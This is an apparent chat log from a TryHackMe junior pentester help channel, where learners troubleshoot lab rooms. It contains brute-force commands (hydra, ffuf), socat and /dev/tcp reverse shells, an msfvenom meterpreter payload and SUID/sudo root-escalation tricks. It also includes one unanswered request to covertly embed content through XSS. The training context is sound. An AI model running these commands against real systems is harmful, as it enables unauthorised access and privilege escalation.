#junior-pentester-path

Comment tag on html using <!— Comment note —>

On JS and css // comment for one line,
`/**

• comment
  */`
  for multi line

Yeah I am still not seeing the answer that Trytohackme wants. I see the source code, but I cannot find the answer. I'll keep looking further into it, thank you for the help

Gave +1 Rep to @ornate comet (current: #789 - 4)

Also follow all link on the page

Can you please send DM a screenshot of how you found the answer or send a video? I tried looking for it but I think I am not looking in the right place

Sorry i am on phone right now

Did you right click on the page and go to "View Page Source"? This should take you to view-source:http://10.10.x.x/ at which point you read through the small amount of code on the page. The hint within the question says to ||go to the link mentioned in the comment. The text that is in the form of comments should be in green so look there.||

hey just did the netsec challenge, and at first the hydra brute force was taking FOREVVVERRRR and i finally figured it out. When I add '-t 64' to increase the number of parallel channels, it slows down the attack immensely. I can't figure out why and can't find anything googling it. Anyone know why

hydra -l quinn -P /usr/share/wordlists/rockyou.txt 10.10.129.165 -s 10021 -t 64 ftp

is 100's of times slower than:

hydra -l quinn -P /usr/share/wordlists/rockyou.txt ftp://10.10.129.165:10021

It was probably due to the target not having enough resources to handle and to respond to 64 simultaneous threads in a single request or process.

that makes sense. follow up, lets say youre trying to optimize for speed, is there a way to quickly assertain the fastest number of channels besides run, watch for 1-2 minutes, cancel, then try another combo?

I'm a beginner myself so that's what I do. 😅

Let's wait for other experienced ones to chime in.

Im struggeling to get through the authentication bypass room, the attackbox just won't run the ffuf as its supposed to

Can you verify and screenshot?

Screenshoot what ?

The error

Oh its not giving me an error but im not getting the right output even tho the command is correct

Ok, is your terminal in full screen?

That could be making it harder to see

yeah the problems with some programs when the columns and rows are not the expected sizes... fun

#general message

Didn't help, but thank you

Gave +1 Rep to @remote iris (current: #2 - 1851)

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.196.64/customers/login -fc 200
/'\ /'\ /'\
/\ _/ /\ _/ __ __ /\ _/
\ \ ,\ \ ,/\ /\ \ \ \ ,\
\ \ _/ \ \ _/\ \ _\ \ \ \ _/
\ _\ \ _\ \ _/ \ _\
// // /_/ //

   v1.3.1

:: Method : POST
:: URL : http://10.10.196.64/customers/login
:: Wordlist : W1: valid_usernames.txt
:: Wordlist : W2: /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=W1&password=W2
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 200

:: Progress: [5/100] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors::: Progress: [100/100] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Error:: Progress: [100/100] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::

Im just getting this, i should be getting at least one W2: Password and W1:Username

Anyone capable/willing to walk someone who's apparently skipped cookie manipulation and web tech most of their career.... through how to do both authentication bypass as well as local file inclusion within a manipulated cookie?

I have the first part down, not a problem. But I'm apparently an idiot and am missing the second part.

What does your valid_ussrnames file look like?

I fixed it but thank you ☺️

Gave +1 Rep to @prisma raptor (current: #22 - 338)

Might the Burp Module, specifically the Other Modules part need an update? According to the text in Task 8 I need to select the "Form field" radio button, but this one is greyed out. Have read that others are experiencing the same, but no solution was given. Cant continue now 😦

Anyone have some time to help with some tips or hints on file inclusion via cookies?

i had trouble with that too, it's hard to explain but the way i fixed it is by capturing the initial request in the proxy and sending it to repeater, before sending the request in repeater and then using the 'follow redirection' button at the top which will then generate a GET request. that's the one you want to then send to sequencer (through right click menu).

@fluid lance thanks! I will try that out 😉

Gave +1 Rep to @fluid lance (current: #428 - 10)

I don't understand the second last and last paragraphs. I don't get what the stars mean here

The computer was looking for two pings it expected to recieve, but instead got none.

hey in room ripper what to do after finding Password of root.xlsx tried to login to ssh but not working

Is there something wrong with server hosting the Local File Inclusions Challenges. Most of the time even browsing the site causes my browser to just spin and spin. It's like the server hosting the site is out of memory or something

Did you add the required entry in the /etc/hosts file?

Can you provide the link to the room?

I think you might be referring to a different room. In the one I'm talking about you only have to access the server at "http://IP/challenges/index.html" or something similar.

I finished it and there was no need to edit /etc/hosts. You just read flags in /etc/flag1, etc...

Some of them you have to change the request from GET to POST and whenever I did it would hang for a long time, then run really slow after. For challenge 3 it was really bad.

It doesn't matter now, I finished it, but it was definitely running slow and spotty.

Hi, I'm currently in the "what the shell?" room and I'm harving problems logging into the windows machine through evil-winrm. As far as I understand the syntax goes something like this evil-winrm -i IP -u user -p password but I get an winrm authorization error. Does anyone what may be causing this?

Can you share a screenshot of the actual error (When I tried to search the error, Google suggested that it might be authentication error instead)? You'll need to verify your account to do so.

got hopelessly stuck on linux privesc crontab task before looking it up and realising i needed to make my file executable for it to work 🤦

It can happen to anyone. Just make sure you add it in your notes. 👍

i want to start bufferoverflow so from where i can start

Anyone on "Content Discovery" and cant get the support page to load? http://MACHINE_IP/robots.txt

Im getting a HTTP Error code 405

Have you clicked on the green Start Machine somewhere in the first few tasks?

Yep lol

I just gave up will try again later

You'll have to wait for a couple of minutes for the attached VM to fully spin up and do check if you are connected to THM OpenVPN.

I'm on linux priv esc task 11 and I keep getting exec format errors when i try to run the C file on the target machine

I did it through Kali first and then through the attack box

I created the directory /tmp/backup, mounted it on the NFS shared folder (?) /home/backup, created the file nfs.c, gcc'd it into just nfs, added the SUID bit with chmod +s, and then tried to run it with ./nfs from the target machine

Both nfs and nfs.c are showing up on the target folder properly, and with proper permissions too

so any advice on how to fix the exec format error?

Is this the the one where you use it over ssh?

Yeah, i ssh into the target machine and then make changes to the NFS from the attacking machine

Did you compile the nfs.c in the attackbox or the ssh?

The attackbox

by compile you mean gcc right?

Yeah.

That's why it might not work.

When you compile something, you're giving it system variables, since this was differe from enviorement to enviorment, you'll need to compile it on the envriorment you wish to run it on.

So I should compile nfs.c on the target machine?

🙂 yes.

Then it should assign it all the stuff it needs to from the machine, and would become a better executible.

Awesome, thank you

And just so i can use the proper language: I found /home/backup in /etc/exports. Would I say that /home/backup is an NFS shared folder or something?

If it's set at that, yeah, you can learn more HERE about NFS enumeration, this is also a good website.

Beautiful, thank you

Gave +1 Rep to @remote iris (current: #2 - 1887)

I'm having trouble compiling - gcc isn't available. I can't find another compiler online to use, either. is there something slick I can hit nfs.c with inside of the target machine that I'm not seeing?

EDIT: figured it out - i did chmod ugo+rwx nfs from the Attack Box and that solved the issue

i did this task just earlier this week, i used --static when compiling to make it work but it was tricky to figure it out

whats that do?

Also I ran the file from a different NFS folder - home/ubuntu/sharedfolddr instead of /home/backup

i think it makes the compiled file have no dependencies, also I wasn't able to access /home/backup folder to run the file so I just used /tmp

I used this option as well initially.

Is there a better option?

#room-bugs message

#room-bugs message

Interesting, thank you!

Gave +1 Rep to @prisma raptor (current: #19 - 370)

Hello

I having trouble solving Task 11 of Linux Privilege Escalation Room

in the Jr. Penetration Testing Pathway

This is the error Im getting when I use the exploit compiled in my Kali Machine

Does anyone know how to compile exploit with a specific GLIBC version

Can you use gcc?

Not on the victim machine

https://tryhackme.com/room/linprivesc

The NFS PrivEsc Vector

Which task?

Task 11

Im connecting it through my own Kali machine

For whoever is having NFS issue in task 11, use the flag "-static" when compiling. You're welcome

Why not copying bash from server and setuid on local mount just play with ./bash -p

well that sometimes works... better option is to live of the land and copy a binary on the target machine to the nfs share folder that you can then set the suid bit on to exploit using things like those recommended on gtfobins

Im sorry. Can you please elaborate this approach? I did not get it

On server copy /bin/bash to shared folder
From local as root chown root:root bash && chmod +s bash.
After that look bash permission in server try to run it with ./bash -p

Ok Thanks for the explanation. I will try it now

Hi all, im having trouble on this step. Authentication Bypass room, step 3. I created the .txt but the command cannot find it. What am I staring at that I cant see? lol

Can you ls and see if you can see it?

@remote iris yes its in desktop

Is the terminal in the same directory?

yes, im using the default attack box if that helps

Can you verify and show screenshots?

Can you type ls and show me the output only of the term*inal?

You're not longer on the Desktop directory

Now run the command from that directory

ohhh lol I read that direction so wrong ! thank you

No worries 😄

learning windows privesc has felt way more convoluted than linux privesc lol

Anyone else get the impression that all these hacking academy's that have popped recently are just a money grab? Most of this stuff will never be found in the wild unless you're hacking a personal IP, in which case you're in handcuffs. And AI is coming on fast, soon negating whats being taught right now (at a low low price), with adaptive LLM WAFs and the like. And we're all just suckers?

Prove me wrong.
please

true

not only that have popped recently

Hello, i'm doing What the shell room, at task 7 for the last question, should we not add also verify = 0 for connecting to the listener?

https://tryhackme.com/room/introtoshells

Thanks

You should. What was the accepted answer?

@prisma raptor socat OPENSSL:10.10.10.5:53, EXEC:"bash -li",pty,stderr,sigint,setsid,sane

Mine had verify=0 in it. Probably due to answer tolerance.

Oh yeah surely

in practice we should, if not we could not validate the certificate right?

Yes and it will throw an error or refuse the connection.

Okay i see thanks !

Gave +1 Rep to @prisma raptor (current: #18 - 387)

Is that a bot which counts every help? lol

Based on certain key words, yes.

Oh yeah funny

Can't exchange it for anything though.. so I simply don't mind it at all.. 😅

Haha sadly

I'm getting a bit confused in Authentication Bypass, Username Enumeration. I put the command in, and I got a large brick of text as a return. I can see the names I am looking for when I look very closely. But after checking a walkthrough video I noticed they don't get the massive text brick I do from the same command

this is the command as entered

it looks like you resized your terminal after running the command

hi, i have a problem with a a rom, Tools of the Trade Windows Privilege Escalation i cannt complete the task, and is just click and complete 😦

Can you provide a link to the room? Have you tried to refresh the page and click it again?

Hello everyone i have a question please, in the SSRF Room, we modify <value=assets/avatars/img1.png> to <value=/private> and theres a deny list on "/private" so the room's solution is <value=x/../private> but when i did my own way before which is <value=./../private> it doesnt work, Doesnt x/../private and ./../private both resolve to the same directory ? Chatgpt for one says that, and is there an "x" named directory i'm not aware of ? Thanks to anyone who answers 😄

Reread the last 4 paragraphs of the practical.. it explains to you why the x is needed to bypass the filtering.

Did you atleast read my question before answering ? because it doesnt seem like you did.

I absolutely read your question, and in the teach a man to fish vein of thought, I was pointing you to the section of the room which explains why the x is needed and why x/ ../private and ./ ../private are not the same thing

x just happens to be an arbitrary value of some thing that "is not /private", so you get past the filter and then traverse the way you want.

I have a question kinda similar about THM specifically. Ik I just started, and theres many more modules to go, but it feels like many of these hacks aren't really practical to real life. Do they get more similar to the real world as modules get more advanced?

And not just more similar but actually usable if I want to work as a pentester?

The vulnerabilities you leverage to gain foothold, pivot and escalate your privileges are based on real-life vulnerabilities and misconfigurations. These may not be setup or configured in the exact same way, but can be exploited in actual environments when not configured or adequately protected / patched.

The technical know how you gain and the mindset, for sure.

Got it thanks

Gave +1 Rep to @prisma raptor (current: #16 - 417)

However, in actual environments and real-life engagements, there are other factors you need to consider such as limitations described in rules of engagements such as whether or not you are allowed to exploit vulnerable services or testing these should suffice, agreeing engagement scope, etc.

and (hopefully) many of the lessons learned have been mitigated in security conscious newer systems.. some of the things and exploits you are learning are older for sure, but its' about learning the concepts for application later.

yes the mindset and technical knowledge are the building blocks. you might run into some of these exploits in the wild, but unlikely. Most networks, apps, whathaveyou, are updated to the latest and greatest, so you will need to learn about cloud architecture like AWS, GCP and the like along with Active Directory and more advanced topics to find any real-world application. But it all depends on what your goal is. If its pentesting, than most of what is covered in THM will be practical. If its Bug Bounty, you'll need a lot more learnin. If its red Teaming, join the military.

hello, for any helps about this path i can post it here ? 🙂

yes

okey thanks !

i'm currently learning about RFI, i have to try out an RFI attack on a dedicaded labs, but how am i supposed to do ? i mean i have no server on my own even localserver... and if i'm not wrong i need one. How am i supposed to do ?

You can look at the Juice Shop and DVWA rooms in THM.

thank you !

Gave +1 Rep to @prisma raptor (current: #16 - 419)

Sorry for the misunderstanding then ! But let's say that in reality we are in the /Public directory, of course /Private is blacklisted to access but you can access other things such as "x", if i launch ./../Private, wouldnt that resolve to /Public/../Private, if anything the Server should return no "x" directory found, so my thought was : Lets use the current directory and traverse that way, but i seem to be missing some important parameter here 😦

Ok got it thank you

Gave +1 Rep to @indigo swan (current: #1997 - 1)

What do you recommend I do once I finish all the pathways?

if someone is on the flag3 for the challenge from room " file inclusion" feel free to come on voice channel if you want to do it with me

There are lots of boxes to do that are not part of the pathways.

Yes as @prisma raptor said, do more boxes. Continue learning. Maybe start studying for a certification.

Alright Folks - This isnt really a question regarding an issue im currently having within the Jr Pen Test path. So ive been slowly burning through the pathways trying to fully understand each aspect before i move on. However since going onto the File Inclusion paths and the SSRF paths, im just struggling to fully understand and get grips with what is happening. Is this something to expect as its a really early/begineer path and i should just keep going or is there another resource i can look at just to get to grips alittle more. I dont know if ive understood the other parts of the path easier because im alittle more aware of them due to my job and these ones are just abit more benign to me.

As you said, this is a junior-level pathway so the intent is to introduce the concepts and give you a basic level of understanding for each. Should you want to practice on these, there are rooms in THM you can do a practice on to hone your skills better. You can also look at the Web Security Academy to supplement those application-related ones.

cool thanks again

Gave +1 Rep to @indigo swan (current: #1322 - 2)

michael78043: 0 Rep (##ω)

You're still on cooldown

Ye thanks for the clarity didn’t know if I was ment to be understanding things alittle more. I was able to complete the section with relative ease but the theory just didn’t seem to stick but I’ll keep powering through cheers for the response

Gave +1 Rep to @prisma raptor (current: #16 - 423)

Yes, doing more practice will hammer home the point or concepts.

Hey i have a question, i'm learning about SQL injections. i'm currently using the command below to guess the full name of the database letter by letter. But how am i supposed to know that i found the complet name of it ? ( in the example the full name is "sqli_three" but how can i know that it's sufficient and there is no following letters like "sqli_threes" ? Thanks in advance.

You can try databases() = 'sqli_threes' it will then be false 😄

Like makes u try wildcards, and '=' makes you check if its true

yeah i finally found by myself today but thanks you ! 🙂

Gave +1 Rep to @echo geyser (current: #2000 - 1)

I have a question about XSS or the likes. If I’m trying to embed a hidden live stream video into a XSS injection. So when visitors view the forum/blog comments. They are watching the live stream without knowing. Is that at all possible with XSS? If not, what would the best method be to accomplish that?

hi, there is an error (not updated questions) on the passive reconnaissance : shodan.io for nginx

there is a mistake on the "Nmap Live Host Discovery" > subnetworks
How many devices can see the ARP Request? it can't be the answer that it asked for... A switch will never send an arp back from the port that received the frame

Hello all,

I am in the Command Injection room, Task 5.

I have to test some payloads to answer the second question :
What are the contents of the flag located in /home/tryhackme/flag.txt?

I can't find the exact payload to use to find/open/get it.
Any help please ?

What have you tried?

I used the cheat sheet provided. Tested plenty of propositions, a little at random I must admit, guided by my beginner level knowledge of some commands.
The closest I got was to find | dir which gave me the current content of the folder

Ok, maybe you can use other commands 😉

Or get s reverse shell...

Could you please be more specific / give some clues ?

I understand cd might be of use but I can't get to change the current path

You should be able to.

If you ls, cd * and cd ..

Solution I found involved cat

Yeah, I thought you knew linux basics on how to use the CLI?

the basics, I'll gladly refresh that in the linux rooms

https://github.com/suneets1ngh

hi, would like ask for some other way to do this room linux privilege escalation (https://tryhackme.com/room/linprivesc) Task 12 capstone challenge Q2 for flag2.txt file located in rootflag, i did look up a walkthrough to do it for this part, and im not understanding why it was suggested to use the following command to read the flag2.txt after getting into missy user, which is, sudo find . -exec /bin/sh ; -quit, i tried to find if it was in GTFObin as well as on google about this command, but i still cant understand how this command work properbly, but from what im guessing its saying to find any executable way to run /bin/sh to open a shell, then quit it..? im sorry if im missing out any info that i should have known, but i would appreaciate if there are any help to let me know how to understand this command, and, how did you solve that question 2 for you if u have done it before, thank you

https://blog.morphisec.com/unveiling-uac-0184-the-remcos-rat-steganography-saga

Learn about Steganography in under 30 seconds ↴

https://youtube.com/shorts/9qDlmYu-UY0

GTFObins lists "Unix binaries that can be used to bypass local security restrictions in misconfigured systems." For example, if the SUID permission is set for this precise binary, or if the user has sudo rights for it. So, "find" is not used to find anything per se, but to "break out from restricted environments by spawning an interactive system shell" with the "find . -exec /bin/sh ; -quit" command.

how did you rdp to Windows machine? sorry got the solution / way through by using Remmina command in th eLinux box

how to fix segmentation fault (core dumped) while executing .elf file? i got this in metasplot exploitation room while executing the payload on target

What exploit are you running and the payload? Are you using the correct exploit that corresponds to your OS architecture (x86 or x64)?

anyone ever managed to complete task 11 (nfs) of the privilage escalation module from a MAC?

I can complete it fine from a Kali vm, but if I try the same from a MAC, when I try to execute the binary that should give me the shell, instead, I get the error: Text file busy

so, just curious if anyone else managed to do that from a mac or has an explanation for that

On the Metasploit: Exploit Room > Task 5. I found the exploit to use, but only because I browsed around and eventually saw someone on a forum that was on this task too. || I didn't realize that the exploit would be based off of what operating system was running, rather than the services running on the OS. My main question is, I like to search for exploits locally, is there a way to search by operating system exploits? Or just continue to use google for that ||

In exploit-db, you can search for exploit by software, but if you are looking for an exploit code in github, I'm afraid you'll have to do it via Google.

You can also use privilege escalation scripts that could identify potential exploits to use such as linpeas / winpeas, linux smart enumeration, linenum, windows exploit suggester, and the like.

Thank you!

Gave +1 Rep to @prisma raptor (current: #15 - 444)

I have this same issue... In my understanding the Answers to all three questions in the Traceroute part are wrong... They are looking for the targets and not the router before the target in the first two questions and it's not 26 routers between as the 26th is the target...
Or am I wrong with this?

I have a question to the room Vulnerabilities 101. Who is the author of exploit-db? It should be either Offensive Security or str0ke but none of the answers work. Any clues?

Got it.. its OffSec. Damn thats harder than it had to be. These questions are annoying seriously

Hi-im having trouble with #6 on subdomain enumeration. Im using the kali machine and when i issue the command, it shows the following error message:

is this using the attackbox or a VM on your machine?

im using the kali box

what kali box?

it gave me the option of attachthebox or kali so i chose kali because i was getting the same error messages from attackthebox. The web based kali box

change SecLists to seclists (all lowercase)

ie /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt

im at my wits end...maybe ill try this another day

that's working. it just takes some time 😛

also, if you make that terminal slightly wider, it will just replace the bottom line on failure instead of writing to a newline.

Question: In the WIndows PrivEsc Room: Abusing Dangerious Priviledges there is the SeBackup / SeRestore example. But then, when issuing whoami /priv the output shows:

SeBackupPrivilege             Back up files and directories  Disabled
SeRestorePrivilege            Restore files and directories  Disabled

Can someone explain why they are clearly disabled...?

Is that the room by Polomints or 1337rce?

Hello, a question about white-box testing, it states in task 4 in pentesting fundamentals that white box testing is more time consuming to do, wouldnt this type of testing be quicker since you know most of the stuff about the source code? Or am I overthinking this?

From my understanding, you are expected to do more tests in a white box test. Aside from the need to go through whatever documentation that has been provided, you may be required to do tests in the context of different users to determine if there are access control weaknesses or controls that can be bypassed.

i tried privilege escalation using path but didn't work

someone please explain

Can you share the link to this box?

i can't its a private network

but you can try the same in tryhackme linux privilege escalation room

in that also its not working if you use tmp folder

If it is PATH variable manipulation, there should be a process (e.g., cron job) or binary that is being run by a privileged user such as root or via sudo or SUID bits. And you manipulate the system into executing your malicious binary instead of the legitimate one by adding its path in the PATH environment variable. In your screenshot, you even added a SUID bit which isn't clear to me what the purpose is.

then how can we use this method for privilege escalation if we already need root?

I updated it to include the response to your question

Got 3 questions correct but stuck with thrid question. what is directory listing flag question From walking an application task.

https://10-10-45-128.p.thmlabs.com/thm-framework-login.index or tried .html

https://10-10-45-128.p.thmlabs.com/ main URL
flag.txt file

And THM{CHANGE_DEFAULT_CREDENTIALS}
Didn't work. Anything else I need to do?
With the bruteforce, it is easier to find the directory listing like using Nmap but here I do not know how to get it

Need help please.

You use gobuster or similar for forced directory browsing

Hey all,

I need little help with task6 on
https://tryhackme.com/room/walkinganapplication

I do not see contact request form after I click Network tab in the Inspect element option.

have you filled in the form and clicked "send message"?

No actually I do not see the form at all in the request page

@flint idol

Wish I could send image of how it is looking my side but I do not see an option to send images here

you need to verify your tryhackme account in order to post images here

This is how it is showing my side with no contact form in the requests page.

try filling adding some text to boxes on the "contact us" page, then click the green button

Okay, let me see

idk why but this site https://10-10-1-210.p.thmlabs.com/ is getting 504 timed out error. It works for certain time and now it's not working. I tried reconnecting to VPN but didnt work and also in the attacking machine, if Im trying the site. I'm good to enter the url direct right instead of VPN's and all, If so it is doing the same error.

is the target machine still running?

Yes it is running still

what IP does it have? if you restarted the machine, it will have a different IP, and the above link will no longer work (resulting in a 504 error).

Yes ip address changes but after the restart as well it didnt work this time

check the first section again. if the ip address changes, so will the url you need to use.

You mean VPN IP address right?

If it is, then the IP address is same even after disconnect and reconnect of VPN

i mean this. if you restarted the target machine, this will have changed.

Using the build in attackbox this works for me right now at the moment.

Start the virtual machine on this task, wait 2 minutes, and visit the following URL: https://10-10-193-175.p.thmlabs.com (this URL will update 2 minutes from when you start the machine)

Im using this. and not working

that url is working for me just fine

(its different from the one before)

https://10-10-1-210.p.thmlabs.com/ -> 504 error
https://10-10-193-175.p.thmlabs.com/ -> ✅

Yeah, even worked for me till morning. Whenever I started working on task 6 contact request form, It went out

Yeah, you're true. THM should update the URL or do the necessary changes.

What build you're talking about. Could you please lemme know. Maybe next time, if I encounter the same, I may give a try

Built in* in the top of the page you can start a attackbox

Okay, URL is the issue. Thanks @jaunty notch

Gave +1 Rep to @jaunty notch (current: #2022 - 1)

Hey all
I'm in this task Manual Discovery - Sitemap.xml

As per the question
What is the path of the secret area that can be found in the sitemap.xml file?

I accessed the link in attack machine http://10.10.45.191/sitemap.xml using firefox, then I found the secret in local path where it takes me to Acme IT Support website http://10.10.45.xxx/s3cr3t-area when I access this secret path link, I got "You found the sitemap endpoint".

I entered the secret path http://10.10.45.xxx/s3cr3t-area but still its not working
Anything else I need to work on?

empty the text field and look at the answer format

it most likely only wants the /s3cr3t-area as answer

@pseudo coral ⬆️

@sage current I got the answer. Thanks tho!

Gave +1 Rep to @sage current (current: #4 - 1664)

no problem

Hey all
I'm in this task Manual Discovery - Sitemap.xml

As per the question
What is the path of the secret area that can be found in the sitemap.xml file?

I accessed the link in attack machine http://10.10.45.191/sitemap.xml using firefox, then I found the secret in local path where it takes me to Acme IT Support website http://10.10.45.xxx/s3cr3t-area when I access this secret path link, I got "You found the sitemap endpoint".

I entered the secret path http://10.10.45.xxx/s3cr3t-area but still its not working
Anything else I need to work on?

On File Inclusion Room Challenge #2, why is my Burp Intercept Tab does not pickup anything when I refresh the page? How to make it work? Is there something needs to do in the configuration of the Burp?

Are you using the chromium or Firefox?

Its okay now i just forgot to turn on foxyproxy

where does the path of data.html can be found? tried checking root and desktop directory but it doesn't exist there.

nvm.. managed to make it work

having issues with starting authentication bypass.

http://machine_ip/customers/signup shows up as an error. I 'm connected to the attack box through openvpn, have ensured I was connected by testing 10.10.10.10, but still nothing

I replace "machine_ip" with my VPN IP but nothing

It's not the VPN IP you use.

I can't seem to fidn the IP thats needed

you need to start the machine associated with the task

sorry, I've done the machine's IP as well and it shows the same error

http://10.10.244.XXX/customers/signup

That's quite right.

"Error response
Error code: 405

Message: Method Not Allowed.

Error code explanation: 405 - Specified method is invalid for this resource."

That's the attackbox IP.

Read that doc please.

I'm an idiot and new that. I need more coffee. Thanks and sorry for being so dumb this morning lol

no worried, we'll let you off since you're new 😉

😄

commands not working in meterpreter

it says timedout after some seconds

Which room are you working on?

blue

but then i started another meterpreter session and it was working

I’m having an issue with the crontab task in linux priv esc; I’ve modified the backup.sh script to create a connection to my machine with

#!/bin/bash

Bash -i >& /dev/tcp/[my machine IP]/7777 0>&1

Listening on my machine but no connection is coming in; I’ve tried both the eth and tun0 address

Did you chmod the cron? or atleast have it in the path?

It’s in the path and i did chmod to executable, still not picking it up

And the cron is not specified to run in any interval, which automatically runs every now and then

Did you have a capital 'B' in your payload?

I’ve gotten through, my ISP misbehaved so the connection to THM server had been severed; that’s why the listener wasn’t picking up

Thanks

Gave +1 Rep to @prisma raptor (current: #15 - 463)

I'm facing another problem in the NFS privilege escalation task

Getting this GLIBC error when trying to run the executable on target system ./shell: /lib/x86_64-linux-gnu/libc.so.6: version GLIBC_2.34 not found (required by ./shell)

I've researched the error and the solution i'm seeing requires updating glibc-source which is not possible on the target system.

Any pointers that can help please?

#room-help message

I'll check it out, thanks

Gave +1 Rep to @prisma raptor (current: #15 - 467)

Hello everyone I’m currently unable to pass task 2: OSINT - SSL/TLC Certificate because the https://crt.sh server is currently down and I’m required to get a domain logged on crt.sh at 2020-12-26

Anyone able to give some assistance to the username enumeration with ffuf section in the JR pentester

its under Auth bypass

Hi! were you able to figure out how to pipe the whole thing and create valid_usernames.txt and add the usernames that you found using ffu? i'm also stuck

Hey, I created a text file on the desktop stuck the names in there and named it accordingly, the next command didnt work and had to move the terminal file and the txt file into a folder as it wouldnt allow me to run it with them both on the desktop

Never piped before tried to google it but just did a work around instead

@ocean bay

Awesome thank you, I think more or less did the same thing although I'm not sure how you were able to extract the names from the terminal . I had chatgpt help me formulate this line so I could save the result in the file and then read through it with cat command : ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.215.149/customers/signup -mr "username already exists" | tee -a valid_usernames.txt .

i just typed them into the text doc manual extraction 🙂

is " OSI Model " really matter in pentesting ?

Sorry dude, am I supposed to see the results of the ffuf in the terminal? because when I do the brute force part that comes after Username Enumeration, I only get the ffuf logo, the details of the attack (method, url etc) and some lines about the progress and if there were any errors. When I try to save the output in a txt file I get some random JSON code. I don't understant if the actual result should appear on the terminal (which doesn't) or am I missing something

You aren't supposed to pipe the output of ffuf into the valid_usernames.txt as the output will be wonky and won't be usable for the next step.

Its very helpful for teaching the concepts, but I don't think going too deep into each layer will be necessary IMHO. Further, the TCP/IP model is used in practice.

It suggests to pipe it in the section though?

It does? It says otherwise in Task 3?

Your right it does, im tripping wtf was looking at this at midnight

could of sworn it suggested to pipe over just typing but your right it says otherwise

Technically, you can still use output, but you'll need to script or equivalent to clean the output.

Anyone able to give some insight how to solve the challenges in the file inclusion room had a little google and it was saying to use something like the burp suite but that is later on in the jr pentester course or am I missing something

You can use burpsuite, or you can use the URL.

Just append the website URL

Burp just makes it easier.

okay i can just modify the url and get the same output

Yeah 🙂

okay never used it so was like a little bit confused why i got suggested to use it when ive not even covered it yet and its later in the course

thank you though will try and nail it

Why did Challenge 3 in the fileinc room work with curl but not when changing to post on the network tab?

Hi I am on linux privilege escalation. why is this suid vulnerable when i am not the root user and only the root user has the 's' permission

1722 44 -rwsr-xr-x 1 root root 43352 Sep 5 2019 /usr/bin/base64

it allows users who execute the file to temporarily assume the privileges of the file's owner

In that case the owner is root

so even when the permission 'rws' is for the owner of the file the s allows a normal user to assume privilege of owner? I am a bit confused. Cause others only have execute permission not the 's' permission

So you can use that to encode file owner by root (ex: /root/root.txt) you can use /usr/bin/base64 /root/root.txt | base64 —decode

okay, thanks

Can anybody help me out? im at the https://tryhackme.com/r/room/walkinganapplication room and after i paused the line 110 i dont get the flag after refreshing this page? im in task 5 actualy

How is that: "Vulnerability Capstone" is marked as "easy" but it is actually not that easy since you have to change a lot in the script and also make it fit to work with python3. So the room needs a better instruction.

There is a criteria that THM uses in assigning room difficulty. Also, understanding and changing code is a nice skills to have.

Well some stuffs are marked as "Medium" but are "easy" and others are "easy" but actually should be at least medium.

But yeah getting a code-understading is kinda nice to have but I just get confused when it says: Do the steps as previous but they are not as previous lol.

Specially when you have to search for all the issues because python3 and python2 work different. 😄

can someone please help me with RFI?

what your problem ?

You can serve your payload or revshell using python http.server and use that to gain access

burp suite other modules task 7

after Sending to Sequencer can't pick the form field

programme cannot see the token

Follow the instructions step by step carefully

active recdnnaissance task 5 when i use telnet on port 80 it doesnt work

Are you on the Attackbox or your own attack machine?

i fixed it

thanks

Doing the Burp Suite: Other Modules room, on task 8. I capture the request for admin/login in the proxy and send it to sequencer, however its looking for loginToken in the response, not the request, and the 302 redirect you receive from the server only has a session cookie, not the loginToken. Not sure how to proceed here.

Have you made sure that you sent the Request (and not the Response) to the Sequencer from the Proxy ? I also made the mistake of sending the Response instead of the Request by right-clicking the wrong area.

Hi! in the file inclusion room, in the Local File Inclusion part, I'm having trouble to understand the second question. I found the result elsewhere but I just don't get why I don't find the name of the directory using the labs. From what I understand, I should be able to find the directory by searching index.php?lang=../../ since lang should be in languages/ right? but when I try it on the labs I see the error message showing the function include() which sends you to the directory function.include, so I tried index.php?lang=../function.include ... what am I missing? I don't understand

I did, yes. I did end up getting it to work, but with some trickery - I sent it to intruder first, used auto to add section marks, and then sent it to sequencer, and then it worked. It was weird.

Hey yall. Metasploit exploitation room, task 6, question 4. We made our .elf, we put it on the victim machine using wget, we chmod'd it so it can execute, we execute..... and keep getting a segmentation fault. -_-

Admittedly I just used the metasploit payload fromt he example, am I supposed to be doing something different?

I figured I'd still use meterpreter so I could make dumping the hashes easier for the other questions in the task

What was the code you used to create the .elf file? Check you put it in the correct directory.

I just used the command from the example further up in the room: "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={MY IP HERE} LPORT=4444 -f elf > shell.elf"

After wget and chmod I was executing it from the target's home directory - I didn't think that made a difference.

It was phoning home but closing immediately - the listener was telling me the connection was closing, and the segmentation fault error was on the target machine

1. Did you check if the target's architecture is x86 or x64?

2. Did you setup the multi/handler module and set the corresponding payload it expects to receive (as meterpreter payloads can only be received by the multi/handler module)?

Oooooo yes to 2, no to 1. I bet I messed that up. Thanks!

That did it. Thank you for the nudge in the right direction!

I finished this learning path today! Super excited, since it's my first intermediate path.

Any suggestions for Learning paths to explore next?

I would suggest to explore next Red Team and Offensive Pentest (for practice)

#878393611929129000 message

Awesome! I've been dabbling in Red Team and CompTIA PenTest+ a little bit. I'll check out Offensive Pentest too

Ah, thank you!

Gave +1 Rep to @prisma raptor (current: #13 - 512)

Sorry for late response left for vacation next morning. 🤣 Congrats on getting it to work.

Congrats ! Offensive path my favorite. I recommend the search also don't miss out on the rooms not in Pathways.

Authentication Bypass Room with the each task, we use a tool called CURL. Is this tool the best way to be able to test communication with a website that you want to pentest?

I understand ffuf is a great tool but curl basically enables us to communicate in a linux termnial?

There should be other ways, but that will depend on what is it you exactly wanted to do. From my understanding, the room used cURL to better demonstrate how we are manipulating the request to the target website.

